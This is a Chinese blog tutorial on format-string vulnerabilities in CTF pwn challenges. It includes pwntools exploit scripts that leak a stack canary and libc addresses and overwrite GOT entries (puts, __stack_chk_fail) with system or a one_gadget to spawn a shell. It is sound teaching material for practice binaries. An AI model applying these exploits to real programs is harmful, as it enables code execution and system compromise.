pwn中的初级格式化字符串漏洞

最新推荐文章于 2024-05-06 12:28:15 发布
最新推荐文章于 2024-05-06 12:28:15 发布
阅读量977 收藏 23
点赞数 28
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangxunyu6/article/details/136410757
版权

1.格式化字符串漏洞造成的原因

%d 以十进制整数的格式输出
%s 以字符串的的格式输出
%x 以十六进制数的格式输出
%c 以字符的格式输出
%p 以指针的格式输出
%n 到目前为止所输出的字符数(把一个int值写到指定的地址去)
%d 以十进制整数的格式输出

题目中一般会有printf(buf)而不是printf("%p", buf);这两种不同的书写方式造成的结果就是前者会因payload的内容造成泄露地址,后者只会打印出buf的地址。

2.如何利用漏洞

read(0,buf,0x30)
printf(buf)

我们可以在buf内写入%5 $p  ,他就会泄露出某地方的地址。

也就是说我们在遇到这种没有格式化的打印函数时可以进行泄露地址甚至更改部分地址。

3.例题

##例题1   

首先查看main函数可以看到read函数能读入8字节然后通过printf函数打印出来,然后再通过scanf函数读入到v4里面。最后如果v4和v6的值相同便能拿到shell。

from pwn import*
elf=ELF('./pwn1')
p = process("./pwn1")
def bug():
	gdb.attach(p)
	pause() 
payload=b'%11$p'
bug()
p.send(payload)
p.recvuntil(b'0x')
canary=int(p.recv(16),16)
print(hex(canary))
p.send(str(canary))
p.interactive()

 %11$p多去调试,观察泄露出的栈地址去具体改变

##例题2

 存在一个puts($0),如果能改成sysytem($0)就能够拿到shell了

先输入多个%p观察出来偏移为6.(偏移就是我们输入数据的位置,这个可以自己去观察)

那么我们应该先想办法让程序多读入几次数据,不然一次read完成不了太多操作。这里可以通过格式化字符串漏洞把puts的got表改为main函数,payload=fmtstr_payload(6,{elf.got['puts']:main})     解释一下这是利用工具格式是

payload=fmtstr_payload(偏移,{要改的:改为什么})

 然后这样的话我们就能无限利用read进行读入了。然后我们需要泄露libc_base的地址。这里有两种办法一是payload=b'%7$saaaa'+p64(elf.got['read'])。我们知道偏移在第6位,那么先输入%7$saaaa占满第6位,再输入read函数的got表,这样就能把他的真实地址打印出来。还有一种方法就是输入%x$p(x是自己调试出来的数字)这道题是%11$p.可以把printf函数的地址打印出来。进而得到libc_base.然后就是read函数之能读入到rbp前面覆盖不了返回地址。我们能把puts函数改为system函数进而得到shell。payload=fmtstr_payload(6,{elf.got['puts']:system})。

##例题3

可以发现存在canary保护,这里再次对canary进行加深理解,canary保护会生成一个随机数放在rbp的上面当读入数据和canary的值不相同时程序会先跳转到一个名为__stack_chk_fail的函数然后再退出程序。那么我们可以利用这点将__stack_chk_fail改为main函数无限利用read函数

payload=fmtstr_payload(6,{elf.got['__stack_chk_fail']:fmt})后续操作和上题一样只不过改地址后要在后续自己构造的payload后面填充一些数据触发canary保护。

onegadget 

一个小知识点可自行理解。最后把__stack_chk_fail改为one_gadget即可拿到shell

from pwn import*
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(os='linux', arch='amd64', log_level='debug')
p = process("./pwn3")
elf=ELF('./pwn3')  
def bug():
	gdb.attach(p)
	pause() 
fmt=0x4011DD
__stack_chk_fail=0x401018
payload=fmtstr_payload(6,{elf.got['__stack_chk_fail']:fmt})
p.sendline(payload)
payload2=b'%7$saaaa'+p64(elf.got['read'])+b'a'*0x33
p.sendline(payload2)
read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base=read_addr-libc.sym['read']
print(hex(libc_base))
shell=0xe3b01+libc_base
payload=fmtstr_payload(6,{elf.got['__stack_chk_fail']:shell})
p.sendline(payload)
p.interactive()

总结

以上只是部分格式化字符串漏洞。还有一种方法就是通过%x$p泄露出栈地址找到某函数的返回地址,进而修改掉返回地址。

wangxunyu6
关注
  • 28
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4482
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
PWN入门学习
qq_20254219的博客
10-20 2175
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存。 在磁盘的是节,映射到内存就是段。 在执行过程,存储在磁盘具有相同权限的节会被映射到内存合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
ouc 网络安全实验 格式化字符串漏洞
m0_59598029的博客
04-10 580
这个实验很难,前前后后三周左右才啃下来这个硬骨头,期间和同学以及助教讨论学习了很多,通过这门课确实学到了不少有用的东西,只要认真做实验,对漏洞这方面的理解会很深的。
PWN学习
csdn159357258456的博客
03-24 360
在程序运行过程,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。管理用户所释放的内存。
学习PWN一个月后能做什么?
Moyun_vackbot的博客
03-16 2022
本文为笔者初学pwn的知识梳理,如有错误之处,敬请斧正。 栈溢出漏洞 原理 栈是一种后进先出的数据结构。在调用函数的时候,都会伴随着函数栈帧的开辟和还原(也称平栈)。栈结构示意图如下(以32位程序为例): 如图所示,栈空间是从高地址向低地址增长的。但是,若函数用到了数组作为局部变量时,向数组的赋值时的增长方向是从低地址到高地址的,与栈的增长方向相反。若对未限制数组的赋值边界,则可能对数组进行恶意的越界写入,便会把栈的数据覆盖,造成栈溢出漏洞。常用的造成栈溢出漏洞的函数有:scanf,gets
攻防世界 Pwn 进阶 第二页
yongbaoii的博客
02-18 622
00 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆。 攻防世界 Pwn 新手 攻防世界 Pwn 进阶 第一页 01 4-ReeHY-main-100 超详细的wp1 超详细的wp2 03 format2 栈迁移的两种作用之一:栈溢出太小,进行栈迁移从而能够写入更多shellcode,进行更多操作。 栈迁移一篇搞定 有个陌生的函数。 C 库函数 void *memcpy(void *str1, const void *str2, size_t n) 从存储区 str2
pwn入门-buu第二页题解(32道)(持续更新)(3)
2401_84263282的博客
04-26 551
点击查看代码main函数里没啥漏洞,点进去mem_test看看,发现__isoc99_scanf(“%s”, s);函数,这个函数有一个特性就是当它使用 %s 格式说明符来读取输入到字符数组 s ,直到遇到空白字符(空格、制表符、换行符等)才会停止读取。这意味着函数会读取一个以空白字符结束的字符串。那么栈溢出不就来了吗再看左边win_func保存了一个system的函数,但是没有传入参数,既然如此那么我们就可以调用它,然后给他传入参数。刚好程序里有cat flag字符串,那么直接拿来用。
2024年最新pwn入门-buu第二页题解(32道)(持续更新)(2),设计思想与代码质量优化+程序性能优化+开发效率优化
最新发布
2401_84254011的博客
05-06 833
在main函数里面发现gitf和vuln函数,先点进gift函数看看,发现有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?
漏洞初探】从最基础程序入手实战栈溢出
nullptr_zhu的博客
09-17 64
从最基础的栈溢出的程序入手实战,通过借鉴大佬的博文完成了人生第一个漏洞攻击。本文详解了大佬博文的每一步,希望能对大家有所帮助。
pwn题目的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 在exploits文件夹使用python3运行HTTP服务器。 $ python3 -m...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
漏洞利用:Pwn的东西
02-20
漏洞利用我的一些pwn漏洞: 使用针对PHP 7.0-7.4的PHP disable_functions旁路。 对于版本7.0-7.3,使用 PHP disable_functions旁路。 错误在PHP 7.4修复。 在30.05.2019之前发布的版本7.1-7.3使用...
关于读取popen输出结果时未截断字符串导致的命令行注入详解
12-31
这种命令行注入在pwn出现的比较少,所以记录分享一下。 0x01 命令行注入介绍 熟悉web安全的话就知道,如果对特殊字符过滤不当,会引发sql注入或者xss等安全漏洞。其,命令行注入较为严重,因为可以直接拿到...
02-linux pwn入门学习到放弃.pdf
09-20
02-linux pwn入门学习到放弃.pdf
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
电源技术的电感是PWN DC/DC转换器常用的元件
11-16
电感是PWN DC/DC转换器常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
电源技术的电容是PWN DC/DC转换器常用的元件
11-16
电容是PWN DC/DC转换器常用的元件,它与电感一样也是储存电能和传递电能的元件,但对频率的特性却刚好相反。应用上,主要是“吸收 ”纹波,具有平滑电压波形的作用。实际的电容并不是理想的元件。电容器由于有介质...
pwn格式化字符串漏洞
08-30
pwn格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串包含了未经验证的用户输入。攻击者可以通过修改格式字符串的特殊格式标识符来读取或修改内存的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值